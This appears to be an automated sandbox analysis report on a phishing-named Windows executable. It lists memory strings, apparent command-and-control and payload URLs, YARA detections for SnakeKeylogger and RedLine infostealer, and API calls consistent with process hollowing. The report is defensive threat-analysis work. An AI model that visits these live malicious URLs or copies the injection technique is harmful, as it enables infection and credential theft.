                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0C
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe | String found in binary or memory: http://rbg.n
                  Source: alg.exe, 0000000C.00000002.2678337066.0000000000518000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww12.przvgke.biz/
                  Source: alg.exe, 0000000C.00000003.1801065112.0000000001760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzU3ZGE0M2E5
                  Source: alg.exe, 0000000C.00000003.1785018186.0000000001700000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzU3ZGE0MWNm
                  Source: alg.exe, 0000000C.00000003.1830975438.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052183315.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1784696793.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800587225.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1825992446.00000000005BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww12.przvgke.biz/bjede?usid=18&utid=28672493896
                  Source: alg.exe, 0000000C.00000002.2678337066.0000000000518000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800587225.00000000005BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww12.przvgke.biz/fauopp?usid=18&utid=28672494417
                  Source: alg.exe, 0000000C.00000003.1784206549.0000000000589000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww12.przvgke.biz:80/bjede?usid=18&utid=28672493896
                  Source: alg.exe, 0000000C.00000003.1800721272.000000000058A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww12.przvgke.biz:80/fauopp?usid=18&utid=28672494417
                  Source: alg.exe, 0000000C.00000003.2279374376.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1825992446.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.000000000056F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800587225.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2503862949.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2281474066.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1804005716.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1783776008.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1830975438.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2504629883.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052183315.00000000005AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww99.przvgke.biz/bjede
                  Source: alg.exe, 0000000C.00000002.2678337066.000000000056F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww99.przvgke.biz/bjedeT
                  Source: alg.exe, 0000000C.00000003.1800587225.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2503862949.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2281474066.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1804005716.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800849962.00000000005B3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1830975438.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2504629883.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052183315.00000000005AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww99.przvgke.biz/fauopp
                  Source: alg.exe, 0000000C.00000003.1784206549.0000000000589000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww99.przvgke.biz:80/bjede
                  Source: alg.exe, 0000000C.00000003.1826309227.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800721272.000000000058A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww99.przvgke.biz:80/fauopp
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1571228970.0000000021D3D000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209C2000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429814207.0000000002597000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1585083858.0000000002596000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1642838997.000000007FB6F000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1634935767.0000000022065000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1571228970.0000000021CDF000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209E5000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000000.1571834546.0000000000416000.00000002.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.pmail.com
                  Source: SingleClientServicesUpdater.exe.9.dr | String found in binary or memory: http://www.winimage.com/zLibDll
                  Source: ymafvvdS.pif, 00000009.00000003.2094996714.000000002A440000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
                  Source: ymafvvdS.pif, 00000009.00000003.2095974007.000000002A440000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2096253940.000000002A440000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1577410534.00000000007A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lwaziacademy.com/
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.0000000020A7D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://lwaziacademy.com/royal/2
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.0000000020A7D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://lwaziacademy.com/royal/233_Sdvvfamydeo
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1577410534.00000000007A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lwaziacademy.com/royal/233_SdvvfamydeoM6
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1577410534.00000000007CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lwaziacademy.com/royal/233_Sdvvfamydeo~
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1577410534.00000000007F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lwaziacademy.com:443/royal/233_Sdvvfamydeo
                  Source: alg.exe, 0000000C.00000003.1801065112.0000000001760000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800351712.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1783458530.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1785018186.0000000001700000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz
                  Source: alg.exe, 0000000C.00000003.1801065112.0000000001760000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1785018186.0000000001700000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pcnatrk.net/track.
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0
                  Source: ymafvvdS.pif, 00000009.00000003.1780195449.000000002AE10000.00000004.00000020.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1780016826.000000002A730000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
                  Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknown | HTTPS traffic detected: 41.185.8.252:443 -> 192.168.2.9:49707 version: TLS 1.2
                  Source: Yara match | File source: Process Memory Space: PURCHASE REQUIRED DETAILS 000487958790903403.exe PID: 7608, type: MEMORYSTR

                  System Summary

                  Source: 9.3.ymafvvdS.pif.24742da8.17.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.3.ymafvvdS.pif.24590000.925.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.1.ymafvvdS.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 9.3.ymafvvdS.pif.24742da8.17.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.1.ymafvvdS.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: ymafvvdS.pif PID: 7996, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: initial sample | Static PE information: Filename: PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: 0_2_02B28670 NtUnmapViewOfSection
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: 0_2_02B28400 NtReadVirtualMemory
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: 0_2_02B27A2C NtAllocateVirtualMemory
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: 0_2_02B2DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: 0_2_02B2DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: 0_2_02B28D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: 0_2_02B2DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: 0_2_02B27D78 NtWriteVirtualMemory
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: 0_2_02B27A2A NtAllocateVirtualMemory
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: 0_2_02B2DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: 0_2_02B28D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
                  Source: C:\Users\Public\alpha.pif | Code function: 13_2_001A643A NtOpenThreadToken,NtOpenProcessToken,NtClose
                  Source: C:\Users\Public\alpha.pif | Code function: 13_2_001A4823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
                  Source: C:\Users\Public\alpha.pif | Code function: 13_2_001B7460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
                  Source: C:\Users\Public\alpha.pif | Code function: 13_2_001A64CA NtQueryInformationToken
                  Source: C:\Users\Public\alpha.pif | Code function: 13_2_001A6500 NtQueryInformationToken,NtQueryInformationToken
                  Source: C:\Users\Public\alpha.pif | Code function: 13_2_001BA135 NtSetInformationFile
                  Source: C:\Users\Public\alpha.pif | Code function: 13_2_001BC1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
                  Source: C:\Users\Public\alpha.pif | Code function: 13_2_00194E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp
                  Source: C:\Users\Public\alpha.pif | Code function: 13_2_001A4759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError
                  Source: C:\Users\Public\alpha.pif | Code function: 22_2_001A643A NtOpenThreadToken,NtOpenProcessToken,NtClose
                  Source: C:\Users\Public\alpha.pif | Code function: 22_2_001A4823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
                  Source: C:\Users\Public\alpha.pif | Code function: 22_2_001B7460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
                  Source: C:\Users\Public\alpha.pif | Code function: 22_2_001A64CA NtQueryInformationToken
                  Source: C:\Users\Public\alpha.pif | Code function: 22_2_001A6500 NtQueryInformationToken,NtQueryInformationToken
                  Source: C:\Users\Public\alpha.pif | Code function: 22_2_001BA135 NtSetInformationFile
                  Source: C:\Users\Public\alpha.pif | Code function: 22_2_001BC1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
                  Source: C:\Users\Public\alpha.pif | Code function: 22_2_00194E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp
                  Source: C:\Users\Public\alpha.pif | Code function: 22_2_001A4759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError
                  Source: C:\Users\Public\alpha.pif | Code function: 13_2_00194C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: 0_2_02B28788 CreateProcessAsUserW
                  Source: C:\Windows\System32\alg.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\3f155f6931e417df.bin
                  Source: C:\Users\Public\alpha.pif | File created: C:\Windows
                  Source: C:\Users\Public\alpha.pif | File created: C:\Windows \SysWOW64
                  Source: C:\Users\Public\alpha.pif | File deleted: C:\Windows \SysWOW64
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: 0_2_02B120C4
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: 0_2_02B3E596
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Code function: 9_1_004028B0
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Code function: 9_1_00418244
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Code function: 9_1_004193C4
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Code function: 9_1_00402B90
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Code function: 9_1_004073A0
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Code function: 9_1_00408C60
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Code function: 9_1_0040DC11
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Code function: 9_1_00407C3F
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Code function: 9_1_00418CCC
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Code function: 9_1_00406CA0
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Code function: 9_1_0041A4BE
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Code function: 9_1_00438DF6
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Code function: 9_1_00401650
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Code function: 9_1_00402F20
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Code function: 9_1_00418788
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Code function: 9_1_00402F89
Source: C:\Windows\System32\alg.exe | Code function: 12_2_004A7C00
Source: C:\Windows\System32\alg.exe | Code function: 12_2_004CA810
Source: C:\Windows\System32\alg.exe | Code function: 12_2_004D2D40
Source: C:\Windows\System32\alg.exe | Code function: 12_2_004A79F0
Source: C:\Windows\System32\alg.exe | Code function: 12_2_004C92A0
Source: C:\Windows\System32\alg.exe | Code function: 12_2_004CEEB0
Source: C:\Windows\System32\alg.exe | Code function: 12_2_004C93B0
Source: C:\Users\Public\alpha.pif | Code function: 13_2_00194C10
Source: C:\Users\Public\alpha.pif | Code function: 13_2_0019540A
Source: C:\Users\Public\alpha.pif | Code function: 13_2_001A4875
Source: C:\Users\Public\alpha.pif | Code function: 13_2_001974B1
Source: C:\Users\Public\alpha.pif | Code function: 13_2_001B695A
Source: C:\Users\Public\alpha.pif | Code function: 13_2_00199144
Source: C:\Users\Public\alpha.pif | Code function: 13_2_001B4191
Source: C:\Users\Public\alpha.pif | Code function: 13_2_0019EE03
Source: C:\Users\Public\alpha.pif | Code function: 13_2_00197A34
Source: C:\Users\Public\alpha.pif | Code function: 13_2_00196E57
Source: C:\Users\Public\alpha.pif | Code function: 13_2_0019D660
Source: C:\Users\Public\alpha.pif | Code function: 13_2_001B3E66
Source: C:\Users\Public\alpha.pif | Code function: 13_2_001B769E
Source: C:\Users\Public\alpha.pif | Code function: 13_2_001A5A86
Source: C:\Users\Public\alpha.pif | Code function: 13_2_001A3EB3
Source: C:\Users\Public\alpha.pif | Code function: 13_2_001A4EC1
Source: C:\Users\Public\alpha.pif | Code function: 13_2_00196B20
Source: C:\Users\Public\alpha.pif | Code function: 13_2_001A0740
Source: C:\Users\Public\alpha.pif | Code function: 13_2_001A0BF0
Source: C:\Windows\System32\AppVClient.exe | Code function: 17_2_00BAA810
Source: C:\Windows\System32\AppVClient.exe | Code function: 17_2_00B87C00
